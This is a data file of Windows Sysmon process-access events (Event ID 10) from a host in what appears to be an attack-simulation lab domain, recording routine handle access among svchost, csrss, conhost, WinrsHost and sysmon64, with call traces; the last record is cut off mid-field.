{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2446,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.782\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.782","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2447,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.782\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.782","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2448,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.782\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.782","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2449,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.782\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-0010905D0400}\r\nTargetProcessId: 4120\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.782","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-0010905D0400}","TargetProcessId":"4120","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2450,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.782\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nSourceProcessId: 1312\r\nSourceThreadId: 1544\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-0010BA590400}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.782","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","SourceProcessId":"1312","SourceThreadId":"1544","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-0010BA590400}","TargetProcessId":"4012","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2451,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.782\r\nSourceProcessGUID: {41C8662E-1F8B-5F25-0000-0010905D0400}\r\nSourceProcessId: 4120\r\nSourceThreadId: 4140\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-0010E05C0400}\r\nTargetProcessId: 4108\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.782","SourceProcessGUID":"{41C8662E-1F8B-5F25-0000-0010905D0400}","SourceProcessId":"4120","SourceThreadId":"4140","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-0010E05C0400}","TargetProcessId":"4108","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2452,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.798\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.798","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2453,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.798\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.798","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2454,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.798\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 